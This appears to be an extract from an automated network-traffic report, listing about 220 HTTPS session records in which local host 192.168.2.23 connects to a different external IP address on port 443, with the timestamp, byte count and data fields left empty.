                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21276192.168.2.2336024217.45.42.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21277192.168.2.234822218.1.102.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21278192.168.2.2337770154.173.106.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21279192.168.2.234111824.13.137.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21280192.168.2.2333800124.152.135.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21281192.168.2.2341832173.151.241.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21282192.168.2.234742082.247.236.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21283192.168.2.233420690.187.103.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21284192.168.2.235193031.83.203.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21285192.168.2.2336544212.208.44.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21286192.168.2.2352188202.89.153.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21287192.168.2.235163685.255.54.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21288192.168.2.235456489.28.86.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21289192.168.2.2348576185.253.241.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21290192.168.2.235208273.48.152.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21291192.168.2.2348178134.12.242.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21292192.168.2.23520129.49.193.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21293192.168.2.2345714134.255.14.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21294192.168.2.2332848201.56.200.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21295192.168.2.2342550147.115.29.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21296192.168.2.2342340159.87.6.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21297192.168.2.2342792204.132.210.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21298192.168.2.2348092163.177.239.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21299192.168.2.2339188167.154.221.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21300192.168.2.2359692192.42.45.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21301192.168.2.23379681.214.32.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21302192.168.2.23453844.187.142.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21303192.168.2.2348794108.212.109.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21304192.168.2.2342482105.21.159.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21305192.168.2.2340724168.6.8.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21306192.168.2.2338900144.95.190.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21307192.168.2.2333710203.43.11.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21308192.168.2.2338008131.64.9.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21309192.168.2.233440048.217.231.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21310192.168.2.2344704105.221.67.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21311192.168.2.234154640.251.110.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21312192.168.2.23382982.228.177.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21313192.168.2.234998886.59.28.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21314192.168.2.2354266186.238.81.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21315192.168.2.2356886223.46.125.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21316192.168.2.2347318210.192.13.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21317192.168.2.234554242.190.235.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21318192.168.2.2339810120.192.70.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21319192.168.2.2341888180.215.175.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21320192.168.2.2337328155.219.198.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21321192.168.2.235580481.98.90.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21322192.168.2.2340006168.32.64.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21323192.168.2.234405819.183.139.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21324192.168.2.234612452.122.126.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21325192.168.2.233559059.62.79.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21326192.168.2.2348346213.98.76.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21327192.168.2.235655238.219.101.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21328192.168.2.234335465.179.123.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21329192.168.2.2349126124.164.237.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21330192.168.2.234192070.157.17.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21331192.168.2.2338962203.191.27.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21332192.168.2.2351226106.228.63.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21333192.168.2.2354814133.174.0.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21334192.168.2.233531836.115.85.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21335192.168.2.235617040.165.253.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21336192.168.2.2343226192.253.224.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21337192.168.2.233717620.73.144.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21338192.168.2.2350696219.180.150.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21339192.168.2.2337542220.154.66.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21340192.168.2.2340434151.172.147.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21341192.168.2.233676681.9.11.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21342192.168.2.2339934125.61.223.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21343192.168.2.2339180156.233.0.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21344192.168.2.2359610163.74.231.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21345192.168.2.2349108157.89.24.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21346192.168.2.233749043.101.166.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21347192.168.2.2338762100.153.155.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21348192.168.2.23338645.142.73.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21349192.168.2.235161420.76.171.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21350192.168.2.234499639.67.188.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21351192.168.2.2355220130.55.150.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21352192.168.2.235775813.106.59.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21353192.168.2.2345120206.80.184.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21354192.168.2.2349834185.68.211.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21355192.168.2.2339588222.78.89.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21356192.168.2.2356508143.172.128.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21357192.168.2.235330450.51.155.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21358192.168.2.235784871.202.115.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21359192.168.2.2349186131.64.38.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21360192.168.2.234126468.56.149.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21361192.168.2.234233224.234.94.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21362192.168.2.2358394143.11.96.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21363192.168.2.233797252.244.99.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21364192.168.2.2345426186.21.195.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21365192.168.2.2335506111.172.58.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21366192.168.2.235184047.224.200.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21367192.168.2.2354214219.108.52.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21368192.168.2.235930446.20.75.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21369192.168.2.2332996181.216.169.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21370192.168.2.234977077.76.255.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21371192.168.2.2340576137.236.142.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21372192.168.2.2343276137.133.65.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21373192.168.2.233361819.199.61.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21374192.168.2.234195870.50.126.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21375192.168.2.2338430163.39.151.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21376192.168.2.2344186183.184.228.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21377192.168.2.23414181.72.147.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21378192.168.2.235661240.28.101.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21379192.168.2.2355994101.143.51.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21380192.168.2.2338202217.202.58.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21381192.168.2.2341900147.128.165.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21382192.168.2.2349114219.188.92.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21383192.168.2.2351386171.86.149.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21384192.168.2.234263052.218.168.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21385192.168.2.234761278.132.202.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21386192.168.2.2356128218.213.190.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21387192.168.2.235778639.91.252.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21388192.168.2.2340336154.122.73.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21389192.168.2.2342406125.231.77.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21390192.168.2.2347558100.8.191.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21391192.168.2.2356160206.232.155.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21392192.168.2.2334518155.233.206.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21393192.168.2.2353284122.64.108.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21394192.168.2.235552251.255.12.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21395192.168.2.234235623.14.168.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21396192.168.2.235451842.41.12.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21397192.168.2.2334482120.247.6.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21398192.168.2.2347664155.193.13.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21399192.168.2.234263093.78.136.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21400192.168.2.235996487.121.102.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21401192.168.2.233497847.95.53.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21402192.168.2.235476498.155.8.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21403192.168.2.235193260.117.20.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21404192.168.2.234765474.214.218.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21405192.168.2.2352608200.99.78.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21406192.168.2.2343862142.218.249.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21407192.168.2.2338974106.15.109.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21408192.168.2.235612053.63.184.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21409192.168.2.233920635.65.195.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21410192.168.2.233761244.157.226.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21411192.168.2.2357022187.169.41.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21412192.168.2.235986490.95.124.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21413192.168.2.2350092112.19.14.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21414192.168.2.2358784114.6.168.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21415192.168.2.233657474.64.208.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21416192.168.2.2333712110.219.119.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21417192.168.2.2360702138.133.90.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21418192.168.2.2351748130.49.175.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21419192.168.2.2333068194.91.105.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21420192.168.2.235791479.114.15.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21421192.168.2.235749414.229.188.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21422192.168.2.2342478191.192.106.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21423192.168.2.2349504145.53.109.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21424192.168.2.2359802107.163.16.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21425192.168.2.2360654104.13.18.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21426192.168.2.235296817.78.130.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21427192.168.2.234835460.111.182.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21428192.168.2.2333652194.82.7.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21429192.168.2.2357190151.70.151.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21430192.168.2.2333544145.138.3.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21431192.168.2.234970023.238.9.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21432192.168.2.233994467.124.69.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21433192.168.2.235006224.139.88.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21434192.168.2.233435835.108.199.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21435192.168.2.234343683.141.82.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21436192.168.2.235610643.195.67.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21437192.168.2.235770064.68.41.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21438192.168.2.2347504213.111.172.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21439192.168.2.2347352114.162.198.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21440192.168.2.2353288119.92.237.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21441192.168.2.234167092.172.34.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21442192.168.2.234509057.183.195.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21443192.168.2.2356718156.107.235.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21444192.168.2.235219869.224.55.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21445192.168.2.234682849.145.207.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21446192.168.2.235681293.82.10.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21447192.168.2.2354788122.179.58.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21448192.168.2.235927281.198.95.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21449192.168.2.234083418.218.117.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21450192.168.2.23550469.96.5.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21451192.168.2.233404894.148.15.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21452192.168.2.2359248114.119.147.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21453192.168.2.233473239.222.217.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21454192.168.2.2337122164.165.90.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21455192.168.2.234236639.24.104.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21456192.168.2.2344164153.67.92.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21457192.168.2.233729662.18.250.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21458192.168.2.2335016197.171.122.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21459192.168.2.2347174163.244.176.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21460192.168.2.2358254161.166.1.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21461192.168.2.2349696114.238.106.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21462192.168.2.2336450223.182.241.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21463192.168.2.235605840.242.129.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21464192.168.2.2334046210.255.247.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21465192.168.2.234273476.191.189.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21466192.168.2.234153659.128.6.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21467192.168.2.2335822128.228.36.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21468192.168.2.235047884.179.248.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21469192.168.2.2346328156.103.69.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21470192.168.2.2343468153.181.152.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21471192.168.2.2352100122.18.139.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21472192.168.2.233870491.236.158.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21473192.168.2.2341724204.166.57.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21474192.168.2.2348596134.11.70.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21475192.168.2.234964896.80.116.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21476192.168.2.235816486.106.63.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21477192.168.2.234234651.142.234.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21478192.168.2.234613227.161.135.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21479192.168.2.2345312189.214.219.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21480192.168.2.2358206218.97.65.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21481192.168.2.234206444.163.77.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21482192.168.2.2341130190.208.76.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21483192.168.2.2360428212.252.71.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21484192.168.2.234197263.94.56.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21485192.168.2.2357326117.177.108.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21486192.168.2.2348818119.102.100.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21487192.168.2.2359800142.162.178.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21488192.168.2.2353414151.196.82.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21489192.168.2.2335410156.181.97.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21490192.168.2.2350812130.161.41.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21491192.168.2.235530497.63.192.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21492192.168.2.234297838.118.219.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21493192.168.2.2358640195.153.120.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21494192.168.2.233404263.67.225.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21495192.168.2.2345914117.138.88.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21496192.168.2.2347476188.205.110.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21497192.168.2.234775477.10.182.46443
                                                TimestampBytes transferredDirectionData


